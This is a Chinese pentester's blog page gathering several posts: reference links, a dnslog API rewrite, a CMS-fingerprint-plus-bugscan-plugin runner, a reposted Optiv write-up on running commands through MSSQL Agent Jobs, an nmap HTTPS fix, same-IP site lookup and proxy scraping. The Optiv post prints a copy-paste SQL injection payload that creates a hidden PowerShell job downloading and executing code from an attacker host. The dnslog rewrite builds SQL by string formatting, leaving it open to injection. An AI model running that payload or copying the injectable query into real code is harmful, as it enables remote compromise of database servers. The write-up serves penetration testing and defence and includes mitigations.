burp出品的服务器端模板注入教程

发布时间:February 27, 2017 // 分类:工作日志,linux,转帖文章,windows // 1 Comment

地址:http://blog.portswigger.net/2015/08/server-side-template-injection.html
好长..看了一下,却是讲的很清楚..
抽空翻译下..

XSS 绕过的地址:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

https://html5sec.org/

** 从内存中恢复python代码**

https://gist.github.com/simonw/8aa492e59265c1a021f5c5618f9e6b12

** 利用svn下载github项目中的某个文件夹或者文件 **
比如要下载:

https://github.com/xubo245/SparkLearning/tree/master/docs

下面的两个文件夹,每个文件夹下有多个pdf文件
方法:
将“tree/master”改成“trunk”

https://github.com/xubo245/SparkLearning/trunk/docs

下载:

svn checkout https://github.com/xubo245/SparkLearning/trunk/docs

一些笔记

1.XML external entity (XXE) injection vulnerabilities

https://www.vsecurity.com//download/papers/XMLDTDEntityAttacks.pdf

2.Server-side code injection vulnerabilities

https://www.mindedsecurity.com/fileshare/ExpressionLanguageInjection.pdf

3.SSI Inject

http://httpd.apache.org/docs/current/howto/ssi.html

改造dnslog的api为我们需要的输出方式

发布时间:December 13, 2016 // 分类:开发笔记,linux,python,windows,生活琐事 // No Comments

以前有cloudeye,发现它的api友好的不得了,后来又尝试过一段时间的ceye.io就是ceye.io其实不稳定,后来把目光转向了dnslog不得不说dnslog的开源确实是方便,但是它的api确实是蛋疼的紧
比如我们有一个whoami的参数

通过api查询

http://webadmin.secevery.com/api/web/www/whoami/

发现是false,仔细对比了下它的api函数,居然是

def api(request, logtype, udomain, hashstr):
    apistatus = False
    host = "%s.%s." % (hashstr, udomain)
    if logtype == 'dns':
        res = DNSLog.objects.filter(host__contains=host)
        if len(res) > 0:
            apistatus = True
    elif logtype == 'web':
        res = WebLog.objects.filter(path__contains=host)
        if len(res) > 0:
            apistatus = True
    else:
        return HttpResponseRedirect('/')
    return render(request, 'api.html', {'apistatus': apistatus})


host = "%s.%s." % (hashstr, udomain) 这尼玛~
只能查询xxxx.fuck.dns5.org的类型了.对于fuck.dns5.org/?cmd=fuck的形式好像不能查询。这尼玛~本想重新改写的.发现工程量太大了,就拿dnslog来修改api函数就好了
 #重新改写api
#1.默认访问全部的日志信息
#2.可以访问/api/xxxx/dns|web/
#3.可以精确定位到/api/xxxx/(dns|web)/xxxx/
步骤
#先获取userid 
#xxx = (select userid from logview_user where udomain = udomain)
 
再根据dns|web的方式分别执行sql语句
if logtype == 'dns':
        #需要执行的是select log_time,host from logview_dnslog where userid = xxx and path like '%hashstr%'
elif logtype == 'web':
        #需要执行的是SELECT "remote_addr","http_user_agent","log_time","path" FROM "logview_weblog" WHERE "user_id"=xxx and path like '%hashstr%'
 
这里的hashstr其实是可以为空的.就拿默认的数据库来测试

SELECT "log_time","remote_addr","http_user_agent","path" FROM "logview_weblog" WHERE user_id=(select id from logview_user where udomain = 'test') and path like '3%'
log_time    remote_addr http_user_agent path
113.135.96.202  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36    123.test.dnslog.link/
113.135.96.202  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36    123.test.dnslog.link/favicon.ico

保持hashstr为空

SELECT "log_time","remote_addr","http_user_agent","path" FROM "logview_weblog" WHERE user_id=(select id from logview_user where udomain = 'test') and path like '%%'

结果依然是

log_time    remote_addr http_user_agent path
113.135.96.202  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36    123.test.dnslog.link/
113.135.96.202  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36    123.test.dnslog.link/favicon.ico

这样就保证了xxx的完整性
 
大概改写后的api函数为

def api(request, logtype, udomain, hashstr):
    result = ''
    #首先保证udomain不能为空
    if len(udomain)>0:
        if logtype == 'dns':
            sql = "select log_time,host from logview_dnslog where userid = (select userid from logview_user \"
                "where udomain = {udomain}) and path like '%{hash}%'".format(udomain=udomain,hash=hashstr)
        elif logtype == 'web':
            sql = "SELECT log_time,remote_addr,http_user_agent,path FROM logview_weblog WHERE user_id=(select \"
                "id from logview_user where udomain = {udomain}) and path like '%{hash}%'".format(udomain=udomain,hash=hashstr)
        logging.info(sql)
        #excute.sql
    return result



其实意淫而已。不熟悉django.还在泪奔中。真特么的狗日的chrome的未知bug。动方向键就奔溃。


大约完毕了,以后有bug再说

def api(request, logtype, udomain, hashstr):  
    import json                                         
    result = None
    re_result =                                                                              
    host = "%s.%s." % (hashstr, udomain)                                                               
    if logtype == 'web':                                                                               
        res = WebLog.objects.all().filter(path__contains=hashstr)                                                                                                                  
        if len(res) > 0:                                                                               
            for rr in res:
                result = dict(
                    time= str(rr.log_time),
                    ipaddr = rr.remote_addr,
                    ua = rr.http_user_agent,
                    path = rr.path
                )                                                                     
                re_result.append(result)

    elif logtype == 'dns':      
        res = DNSLog.objects.all().filter(host__contains=host)     
        if len(res) > 0:
            for rr in res:
                result = dict(
                    time = str(rr.log_time),
                    host = rr.host
                    )
                re_result.append(result)

    else:
        return HttpResponseRedirect('/')
    return render(request, 'api.html', {'apistatus': json.dumps(re_result)})

在线cms识别以及bugscan插件调用

发布时间:October 23, 2016 // 分类:开发笔记,linux,python,windows // No Comments

想着自己搞的话估计是比较符合自己的需求。但是问题就是太耗时了,估计覆盖面也不广泛。

恰逢遇到了http://whatweb.bugscaner.com/这个网站,发现它的覆盖面还是不错的。常见的cms都整合过去了。测试了几个发现误报率还是在可以接受的范围内.于是自动化。一个简单的demo.缺点是只能访问http一类的.https的不支持。它提交的时候会自动去掉http|https://

#!/usr/bin/python
import re
import json
import requests



def whatcms(url):
    headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
        "Referer":"http://whatweb.bugscaner.com/look/",
        }
    """
    try:
        res = requests.get('http://whatweb.bugscaner.com/look/',timeout=60, verify=False)
        if res.status_code==200:
            hashes = re.findall(r'value="(.*?)" name="hash" id="hash"',res.content)[0]
    except Exception as e:
        print str(e)
        return False
    """
    data = "url=%s&hash=0eca8914342fc63f5a2ef5246b7a3b14_7289fd8cf7f420f594ac165e475f1479"%(url)
    try:
        respone = requests.post("http://whatweb.bugscaner.com/what/",data=data,headers=headers,timeout=60, verify=False)
        if int(respone.status_code)==200:
            result = json.loads(respone.content)
            if len(result["cms"])>0:
                return result["cms"]
            else:
                return "www"
    except Exception as e:
        print str(e)
        return "www"
        
if __name__ == '__main__':
    import sys
    url = sys.avg[1]
    print whatcms(url)

无法识别的自动判断为www。既然都可以完美搞定了。接下来开始整合插件.我的想法是先分类.读取文件内容中的service。然后再把文件名称和servvice存进数据库.方便以后调用。简单的来个小脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re,os,glob
from mysql_class import MySQL
"""
logging.basicConfig(
    level=logging.DEBUG,
    format="[%(asctime)s] %(levelname)s: %(message)s")
"""
"""
1.识别具体的cms
2.从数据库获取cms--如果没有获取到考虑全部便利
3.输出结果
"""
def timestamp():
    return str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))

"""
DROP TABLE IF EXISTS `bugscan`;
CREATE TABLE `bugscan` (
    `id` int(11) NOT NULL AUTO_INCREMENT,
    `service` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    `filename` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    `time` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8 COLLATE=utf8_bin;
SET FOREIGN_KEY_CHECKS = 1;
"""
dbconfig = {'host':'127.0.0.1','port': 3306,'user':'root','passwd':'root123','db':'proscan','charset':'utf8'}
db = MySQL(dbconfig)

def insert(filename):
    file_data = open(filename,'rb').read()
    service = re.findall(r"if service.*==(.*?):",file_data)
    if len(service)>0:
        servi = service[0].replace("'", "").replace("\"", "").replace(" ", "")
        
        sqlInsert = "insert into `bugscan`(id,service,filename,time) values ('','%s','%s','%s');" % (str(servi),str(filename.replace('./bugscannew/','')),str(timestamp()))
        print sqlInsert
        #db.query(sql=sqlInsert)

for filename in glob.glob(r'./bugscannew/*.py'):
    insert(filename)

然后思考下怎么调用这个具体的插件来进行判断。其实想了好久。直到前不久空着有空看了pocscan。发现这个方式不错.把文件加入到pypath中.然后from xxx import audit 然后就完美解决这个问题了.

def import_poc(pyfile,url):
    poc_path = os.getcwd()+"/bugscannew/"
    path = poc_path + pyfile + ".py"
    filename = path.split("/")[-1].split(".py")[0]
    sys.path.append(poc_path)
    poc0 = imp.load_source('audit', path)
    audit_function = poc0.audit
    from dummy import *
    audit_function.func_globals.update(locals())
    ret = audit_function(url)
    if ret is not None and 'None' not in ret:
        #print ret
        return ret

暂时没完美调用的方式.简单的贴个demo

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re,os
import imp,sys
import time,json
import logging,glob
import requests
from mysql_class import MySQL
"""
logging.basicConfig(
    level=logging.DEBUG,
    format="[%(asctime)s] %(levelname)s: %(message)s")
"""
"""
1.识别具体的cms
2.从数据库获取cms--如果没有获取到考虑全部便利
3.输出结果
"""
def timestamp():
    return str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))

"""
DROP TABLE IF EXISTS `bugscan`;
CREATE TABLE `bugscan` (
    `id` int(11) NOT NULL AUTO_INCREMENT,
    `service` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    `filename` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    `time` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8 COLLATE=utf8_bin;
SET FOREIGN_KEY_CHECKS = 1;
"""
dbconfig = {'host':'127.0.0.1','port': 3306,'user':'root','passwd':'root123','db':'proscan','charset':'utf8'}
db = MySQL(dbconfig)

def insert(filename):
    file_data = open(filename,'rb').read()
    service = re.findall(r"if service.*==(.*?):",file_data)
    if len(service)>0:
        servi = service[0].replace("'", "").replace("\"", "").replace(" ", "")
        
        sqlInsert = "insert into `bugscan`(id,service,filename,time) values ('','%s','%s','%s');" % (str(servi),str(filename.replace('./bugscannew/','')),str(timestamp()))
        print sqlInsert
        #db.query(sql=sqlInsert)
        #print servi,filename

def check(service,url):
    if service == 'www':
        sqlsearch = "select  filename from  `bugscan` where service = '%s'" %(service)
    elif service != 'www':
        sqlsearch = "select  filename from  `bugscan` where service = 'www' or service = '%s'" %(service)
    print sqlsearch 
    if int(db.query(sql=sqlsearch))>0:
        result = db.fetchAllRows()
        for row in result:
            #return result
            for colum in row:
                colum = colum.replace(".py","")
                import_poc(colum,url)

def import_poc(pyfile,url):
    poc_path = os.getcwd()+"/bugscannew/"
    path = poc_path + pyfile + ".py"
    filename = path.split("/")[-1].split(".py")[0]
    sys.path.append(poc_path)
    poc0 = imp.load_source('audit', path)
    audit_function = poc0.audit
    from dummy import *
    audit_function.func_globals.update(locals())
    ret = audit_function(url)
    if ret is not None and 'None' not in ret:
        #print ret
        return ret

def whatcms(url):
    headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
        "Referer":"http://whatweb.bugscaner.com/look/",
        }
    """
    try:
        res = requests.get('http://whatweb.bugscaner.com/look/',timeout=60, verify=False)
        if res.status_code==200:
            hashes = re.findall(r'value="(.*?)" name="hash" id="hash"',res.content)[0]
    except Exception as e:
        print str(e)
        return False
    """
    data = "url=%s&hash=0eca8914342fc63f5a2ef5246b7a3b14_7289fd8cf7f420f594ac165e475f1479"%(url)
    try:
        respone = requests.post("http://whatweb.bugscaner.com/what/",data=data,headers=headers,timeout=60, verify=False)
        if int(respone.status_code)==200:
            result = json.loads(respone.content)
            if len(result["cms"])>0:
                return result["cms"]
            else:
                return "www"
    except Exception as e:
        print str(e)
        return "www"
        
if __name__ == '__main__':
    #for filename in glob.glob(r'./bugscannew/*.py'):
    #   insert(filename)
    url = "http://0day5.com/"
    print check(whatcms(url),url)

其实还有纰漏。比如在调用那块可以考虑下采用多线程来加快速度.还有就是可能出现如果cms无法识别出来。结果肯定不准确。如果全部load进来fuzz一次太耗时了。

得到琦神的demo。貌似更暴力,全加载fuzz一次

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# papapa.py
import re
import socket
import sys
import os
import urlparse
import time
from dummy.common import *
import util
from dummy import *
import importlib
import threading
import Queue as que


class Worker(threading.Thread):  # 处理工作请求
    def __init__(self, workQueue, resultQueue, **kwds):
        threading.Thread.__init__(self, **kwds)
        self.setDaemon(True)
        self.workQueue = workQueue
        self.resultQueue = resultQueue

    def run(self):
        while 1:
            try:
                callable, args, kwds = self.workQueue.get(False)  # get task
                res = callable(*args, **kwds)
                self.resultQueue.put(res)  # put result
            except que.Empty:
                break


class WorkManager:  # 线程池管理,创建
    def __init__(self, num_of_workers=10):
        self.workQueue = que.Queue()  # 请求队列
        self.resultQueue = que.Queue()  # 输出结果的队列
        self.workers = []
        self._recruitThreads(num_of_workers)

    def _recruitThreads(self, num_of_workers):
        for i in range(num_of_workers):
            worker = Worker(self.workQueue, self.resultQueue)  # 创建工作线程
            self.workers.append(worker)  # 加入到线程队列

    def start(self):
        for w in self.workers:
            w.start()

    def wait_for_complete(self):
        while len(self.workers):
            worker = self.workers.pop()  # 从池中取出一个线程处理请求
            worker.join()
            if worker.isAlive() and not self.workQueue.empty():
                self.workers.append(worker)  # 重新加入线程池中
        #logging.info('All jobs were complete.')

    def add_job(self, callable, *args, **kwds):
        self.workQueue.put((callable, args, kwds))  # 向工作队列中加入请求

    def get_result(self, *args, **kwds):
        return self.resultQueue.get(*args, **kwds)
"""
lst=os.listdir(os.getcwd())
pocList =(','.join(c.strip('.py') for c in lst if os.path.isfile(c) and c.endswith('.py'))).split(',')
for line in pocList:
    try:
        #print line
        xxoo = importlib.import_module(line)
        xxoo.curl = miniCurl.Curl()
        xxoo.security_hole = security_hole
        xxoo.task_push = task_push
        xxoo.util =util
        xxoo.security_warning = security_warning
        xxoo.security_note = security_note
        xxoo.security_info = security_info
        xxoo.time = time
        xxoo.audit('http://0day5.com')
    except Exception as e:
        print line,e
"""

def bugscan(line,url):
    #print line,url
    try:
        xxoo = importlib.import_module(line)
        xxoo.curl = miniCurl.Curl()
        xxoo.security_hole = security_hole
        xxoo.task_push = task_push
        xxoo.util =util
        xxoo.security_warning = security_warning
        xxoo.security_note = security_note
        xxoo.security_info = security_info
        xxoo.time = time
        xxoo.audit(url)
    except Exception as e:
        #print line,e
        pass

def main(url):
    wm = WorkManager(20)
    lst=os.listdir(os.getcwd())
    pocList =(','.join(c.strip('.py') for c in lst if os.path.isfile(c) and c.endswith('.py'))).split(',')
    for line in pocList:
        if 'apa' not in line:
    wm.start()
    wm.wait_for_complete()
start = time.time()
main('http://0day5.com/')
print time.time()-start

准确率堪忧啊,仅供参考

MSSQL Agent Jobs for Command Execution

发布时间:October 7, 2016 // 分类:运维工作,工作日志,linux,windows // No Comments

The primary purpose of the Optiv attack and penetration testing (A&P) team is to simulate adversarial threat activity in an effort to test the efficacy of defensive security controls. Testing is meant to assess many facets of organizational security programs by using real-world attack scenarios. This type of assessment helps identify areas of strength, or areas of improvement regarding organizations' IT security processes, personnel and systems.

There exists a cat-and-mouse game in IT security, a never-ending arms race. Malicious actors implement new attacks; defensive controls are deployed to detect and deter those same attacks. It behooves organizations to attempt to be proactive in their defensive posture, and identify new methods of attack and preemptively put controls in place to stop them. Optiv A&P strives to maintain technical expertise in both the offensive and attack arena, along with the defensive methods used to detect and prevent attacks. To stay relevant and effective in this ever-changing threat landscape, it is paramount that organizations that specialize in assessing organizational security posture stay relevant to the tactics, techniques and procedures (TTPs) that are used by genuine threat actors. Optiv engages in proactive threat research to identify TTPs that could be used by threat actors to compromise systems or data.

Attacks that Stay Below the Radar

A goal of many attackers is to implement campaigns that go undetected. The longer an organization is unware of a breach condition, the more time an attacker has to identify and exfiltrate sensitive information, and use the compromised environment as a pivot point for more nefarious activity.

Optiv A&P implements advanced attacks in an effort to identify gaps in detective capabilities, and assist organizations in detecting the attacks.

A recent example of this activity is abusing native functionality with Microsoft SQL Server (MSSQL) to gain command and control of database servers using MSSQL Server Agent Jobs. 

Microsoft SQL Server Agent

The MSSQL Server Agent is a windows service that can be used to perform automated tasks. The agent jobs can be scheduled, and run under the context of the MSSQL Server Agent service. However, using agent proxy capabilities, the jobs can be run with different credentials as well. 

The Attack

During a recent engagement, a SQL injection condition was identified in a web application that was using MSSQL Server 2012. At the request of the client, Optiv performed the assessment in a surreptitious manner, making every effort to avoid detection. Optiv devised a way to take advantage of native MSSQL Server functionality to execute commands on the underlying Windows operating system. Also, the xp_cmdshell stored procedure had been disabled, and the ability to create custom stored procedures had also been limited.

Many monitoring or detection systems generate alerts when a commonly abused MSSQL stored procedure (xp_cmdshell) is used during an attack. The usage of xp_cmdshell by  attackers, and penetration testers has caused many organizations to disable it, limit its ability to be used and tune alerting systems to watch for it.

Optiv identified a scenario wherein the MSSQL Server Agent could be leveraged to gain command execution on target database server. However, the server had to meet several conditions:

  • The MSSQL Server Agent service needs to be running.
  • The account that is being used must have permissions to create and execute agent jobs (in this case the database account that was running the service that had a SQL injection condition). 

Optiv identified two MSSQL Agent Job subsystems that could be advantageous to attackers: the CmdExec and PowerShell subsystems. These two features can execute operating systems commands, and PowerShell respectively.

Optiv used the SQL injection entry point to create and execute the agent job. The job's command was PowerShell code that created a connection to an Optiv controlled IP address and downloaded additional PowerShell instructions that established an interactive command and control session between the database server, and the Optiv controlled server.

Here is the SQL syntax breakdown. Note, in the below download-string command, the URI is between two single quotes, not double quotes. This is to escape single quotes within SQL.

USE msdb; EXEC dbo.sp_add_job @job_name = N'test_powershell_job1' ; EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://IP_OR_HOSTNAME/file''))"', @retry_attempts = 1, @retry_interval = 5 ;EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; EXEC dbo.sp_start_job N'test_powershell_job1';

The above string is for easier copying and pasting, if you want to recreate this attack scenario.

The below quickly shows a demo on how to weaponize this attack.

The SQL syntax is URL encoded. In this specific instance the attack is being sent via an HTTP GET request, hence the necessity to URL encode the payload.

The request, with the SQL injection payload, to an HTTP GET parameter that is vulnerable to SQL injection is shown. Note the %20 (space character) added to the beginning of the payload.

Once the payload is run we can see a command and control session is established, running with the SQLSERVERAGENT account's privileges.

On the victim SQL server we can see the SQL Agent job has been created.

The below video demonstrates the full attack.

Attack Post Mortem

This attack can be leveraged to run MSSQL Server Agent jobs on other MSSQL servers, if the Agent service on the victim is configured to use an account with permissions to other MSSQL servers. Also, Agent jobs can be scheduled, and may be used as an evasive means to maintain a persistent connection to victim MSSQL servers.

In some instances, if the MSSQL Server Agent service is configured with an account that has more privileges than that of the database user, for example an Active Directory domain service account, this attack can be used by an attacker to escalate their privileges. 

Mitigation

General web application hygiene should be used to prevent attack vectors like SQL injection. Use prepared statements in SQL queries within web applications, and abstracting application logic from backend databases. Employ web application firewalls to detect and block attacks on applications.

Internal systems that do not need to communicate directly with Internet hosts should be disallowed from doing so. This can prevent command and control channels from being established between internal assets, and attacker controlled endpoints. Employ strict network egress filtering.

MSSQL Server Agent jobs can be abused by any attacker that has the ability to execute SQL queries on a database server. To specifically limit the attack surface of MSSQL Server Agent jobs ensure that databases are running under the context of user accounts with the concept of least privilege. If the account that a database is running under does not have permissions to create and start MSSQL Server Agent jobs this attack is negated. Also, if the MSSQL Server Agent service is not in use it should be disabled. 

使用python-nmap不出https踩到的坑

发布时间:September 1, 2016 // 分类:工作日志,运维工作,开发笔记,linux,python,windows,生活琐事 // No Comments

今天在使用python-nmap来进行扫描入库的时候发现https端口硬生生的给判断成了http

仔细测试了好几次都是这样子。后来果断的不服气,仔细看了下扫描的参数。发现python-nmap调用的时候会强制加上-ox -这个参数

正常扫描是

nmap 45.33.49.119 -p T:443 -Pn -sV --script=banner

然而经过python-nmap以后就是

nmap -oX - 45.33.49.119 -p T:443 -Pn -sV --script=banner
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/local/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.12 scan initiated Thu Sep  1 00:02:07 2016 as: nmap -oX - -p T:443 -Pn -sV -&#45;script=banner 45.33.49.119 -->
<nmaprun scanner="nmap" args="nmap -oX - -p T:443 -Pn -sV -&#45;script=banner 45.33.49.119" start="1472659327" startstr="Thu Sep  1 00:02:07 2016" version="7.12" xmloutputversion="1.04">
<scaninfo type="connect" protocol="tcp" numservices="1" services="443"/>
<verbose level="0"/>
<debugging level="0"/>
<host starttime="1472659328" endtime="1472659364"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="45.33.49.119" addrtype="ipv4"/>
<hostnames>
<hostname name="ack.nmap.org" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="443"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="Apache httpd" version="2.4.6" extrainfo="(CentOS)" tunnel="ssl" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.6</cpe></service><script id="http-server-header" output="Apache/2.4.6 (CentOS)"><elem>Apache/2.4.6 (CentOS)</elem>
</script></port>
</ports>
<times srtt="191238" rttvar="191238" to="956190"/>
</host>
<runstats><finished time="1472659364" timestr="Thu Sep  1 00:02:44 2016" elapsed="36.65" summary="Nmap done at Thu Sep  1 00:02:44 2016; 1 IP address (1 host up) scanned in 36.65 seconds" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

经过格式化以后看到的内容是

其中的一个参数tunnel.但是看了下https://bitbucket.org/xael/python-nmap/raw/8ed37a2ac20d6ef26ead60d36f739f4679fcdc3e/nmap/nmap.py这里的内容。发现没有与之关联的。

for dport in dhost.findall('ports/port'):
                # protocol
                proto = dport.get('protocol')
                # port number converted as integer
                port =  int(dport.get('portid'))
                # state of the port
                state = dport.find('state').get('state')
                # reason
                reason = dport.find('state').get('reason')
                # name, product, version, extra info and conf if any
                name = product = version = extrainfo = conf = cpe = ''
                for dname in dport.findall('service'):
                    name = dname.get('name')
                    if dname.get('product'):
                        product = dname.get('product')
                    if dname.get('version'):
                        version = dname.get('version')
                    if dname.get('extrainfo'):
                        extrainfo = dname.get('extrainfo')
                    if dname.get('conf'):
                        conf = dname.get('conf')

                    for dcpe in dname.findall('cpe'):
                        cpe = dcpe.text
                # store everything
                if not proto in list(scan_result['scan'][host].keys()):
                    scan_result['scan'][host][proto] = {}

                scan_result['scan'][host][proto][port] = {'state': state,
                                                          'reason': reason,
                                                          'name': name,
                                                          'product': product,
                                                          'version': version,
                                                          'extrainfo': extrainfo,
                                                          'conf': conf,
                                                          'cpe': cpe}

试想下如果把name以及tunnel取出来同时匹配不就好了。于是对此进行修改。410-440行

                name = product = version = extrainfo = conf = cpe = tunnel =''
                for dname in dport.findall('service'):
                    name = dname.get('name')
                    if dname.get('product'):
                        product = dname.get('product')
                    if dname.get('version'):
                        version = dname.get('version')
                    if dname.get('extrainfo'):
                        extrainfo = dname.get('extrainfo')
                    if dname.get('conf'):
                        conf = dname.get('conf')
                    if dname.get('tunnel'):
                        tunnel = dname.get('tunnel')

                    for dcpe in dname.findall('cpe'):
                        cpe = dcpe.text
                # store everything
                if not proto in list(scan_result['scan'][host].keys()):
                    scan_result['scan'][host][proto] = {}

                scan_result['scan'][host][proto][port] = {'state': state,
                                                          'reason': reason,
                                                          'name': name,
                                                          'product': product,
                                                          'version': version,
                                                          'extrainfo': extrainfo,
                                                          'conf': conf,
                                                          'tunnel':tunnel,
                                                          'cpe': cpe}

还有在654-670行里面增加我们添加的tunnel

        csv_ouput = csv.writer(fd, delimiter=';')
        csv_header = [
            'host',
            'hostname',
            'hostname_type',
            'protocol',
            'port',
            'name',
            'state',
            'product',
            'extrainfo',
            'reason',
            'version',
            'conf',
            'tunnel',
            'cpe'
            ]

然后我们import这个文件。在获取的内容里面进行判断.如果namehttp的同时tunnelssl,则判断为https

        for targetHost in scanner.all_hosts():
            if scanner[targetHost].state() == 'up' and scanner[targetHost]['tcp']:
                for targetport in scanner[targetHost]['tcp']:
                    #print(scanner[targetHost]['tcp'][int(targetport)])
                    if scanner[targetHost]['tcp'][int(targetport)]['state'] == 'open' and scanner[targetHost]['tcp'][int(targetport)]['product']!='tcpwrapped':
                        if scanner[targetHost]['tcp'][int(targetport)]['name']=='http' and scanner[targetHost]['tcp'][int(targetport)]['tunnel'] == 'ssl':
                            scanner[targetHost]['tcp'][int(targetport)]['name'] = 'https'
                        else:
                            scanner[targetHost]['tcp'][int(targetport)]['name'] = scanner[targetHost]['tcp'][int(targetport)]['name']
                        print(domain+'\t'+targetHosts+'\t'+str(targetport) + '\t' + scanner[targetHost]['tcp'][int(targetport)]['name'] + '\t' + scanner[targetHost]['tcp'][int(targetport)]['product']+scanner[targetHost]['tcp'][int(targetport)]['version'])
                        #if scanner[targetHost]['tcp'][int(targetport)]['name'] in ["https","http"]:

改造后的文件扫描结果

python 旁站查询

发布时间:July 30, 2016 // 分类:开发笔记,工作日志,代码学习,linux,python,windows // No Comments

旁站查询来源:

效果图如下

#!/usr/bin/env python
#encoding: utf-8
import re
import sys
import json
import time
import requests
import urllib
import requests.packages.urllib3
from multiprocessing import Pool
from BeautifulSoup import BeautifulSoup
requests.packages.urllib3.disable_warnings()

headers = {'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20'}

def links_ip(host):   
    '''
    查询同IP网站
    '''
    ip2hosts = []
    ip2hosts.append("http://"+host)
    try:
        source = requests.get('http://i.links.cn/sameip/' + host + '.html', headers=headers,verify=False)
        soup = BeautifulSoup(source.text)
        divs = soup.findAll(style="word-break:break-all")
        
        if divs == []: #抓取结果为空
            print 'Sorry! Not found!'
            return ip2hosts 
        for div in divs:
            #print div.a.string
            ip2hosts.append(div.a.string)
    except Exception, e:
        print str(e)
        return ip2hosts
    return ip2hosts

def ip2host_get(host):
    ip2hosts = []
    ip2hosts.append("http://"+host)
    try:
        req=requests.get('http://www.ip2hosts.com/search.php?ip='+str(host), headers=headers,verify=False)
        src=req.content
        if src.find('result') != -1:
            result = json.loads(src)['result']
            ip = json.loads(src)['ip']
            if len(result)>0:
                for item in result:
                    if len(item)>0:
                        #log(scan_type,host,port,str(item))
                        ip2hosts.append(item)
    except Exception, e:
        print str(e)
        return ip2hosts
    return ip2hosts


def filter(host):
    '''
        打不开的网站...
    '''
    try:
        response = requests.get(host, headers=headers ,verify=False)
        server = response.headers['Server']
        title = re.findall(r'<title>(.*?)</title>',response.content)[0]
    except Exception,e:
        #print "%s" % str(e)
        #print host
        pass
    else:
        print host,server

def aizhan(host):
    ip2hosts = []
    ip2hosts.append("http://"+host)
    regexp = r'''<a href="[^']+?([^']+?)/" rel="nofollow" target="_blank">\1</a>'''
    regexp_next = r'''<a href="http://dns.aizhan.com/[^/]+?/%d/">%d</a>'''
    url = 'http://dns.aizhan.com/%s/%d/'

    page = 1
    while True:
        if page > 2:
            time.sleep(1)   #防止拒绝访问
        req = requests.get(url % (host , page) ,headers=headers ,verify=False)
        try:
            html = req.content.decode('utf-8')  #取得页面
            if req.status_code == 400:
                break
        except Exception as e:
            print str(e)
            pass
        for site in re.findall(regexp , html):
            ip2hosts.append("http://"+site)
        if re.search(regexp_next % (page+1 , page+1) , html) is None:
            return ip2hosts
            break
        page += 1

    return ip2hosts

def chinaz(host):
    ip2hosts = []
    ip2hosts.append("http://"+host)
    regexp = r'''<a href='[^']+?([^']+?)' target=_blank>\1</a>'''
    regexp_next = r'''<a href="javascript:" val="%d" class="item[^"]*?">%d</a>'''
    url = 'http://s.tool.chinaz.com/same?s=%s&page=%d'

    page = 1
    while True:
        if page > 1:
            time.sleep(1)   #防止拒绝访问
        req = requests.get(url % (host , page) , headers=headers ,verify=False)
        html = req.content.decode('utf-8')  #取得页面
        for site in re.findall(regexp , html):
            ip2hosts.append("http://"+site)
        if re.search(regexp_next % (page+1 , page+1) , html) is None:
            return ip2hosts
            break
        page += 1
    return ip2hosts

def same_ip(host):
    mydomains = []
    mydomains.extend(ip2host_get(host))
    mydomains.extend(links_ip(host))
    mydomains.extend(aizhan(host))
    mydomains.extend(chinaz(host))
    mydomains = list(set(mydomains))
    p = Pool()
    for host in mydomains:
        p.apply_async(filter, args=(host,))
    p.close()
    p.join()


if __name__=="__main__":
    if len(sys.argv) == 2:
        same_ip(sys.argv[1])
    else:
        print ("usage: %s host" % sys.argv[0])
        sys.exit(-1)

 

python获取http代理

发布时间:July 24, 2016 // 分类:工作日志,运维工作,开发笔记,linux,windows,python // 7 Comments

主要是从http://www.ip181.com/ http://www.kuaidaili.com/以及http://www.66ip.com/获取相关的代理信息,并分别访问v2ex.com以及guokr.com以进行验证代理的可靠性。

# -*- coding=utf8 -*-
"""
    从网上爬取HTTPS代理
"""
import re
import sys
import time
import Queue
import logging
import requests
import threading
from pyquery import PyQuery
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()


#logging.basicConfig(
#    level=logging.DEBUG,
#    format="[%(asctime)s] %(levelname)s: %(message)s")

class Worker(threading.Thread):  # 处理工作请求
    def __init__(self, workQueue, resultQueue, **kwds):
        threading.Thread.__init__(self, **kwds)
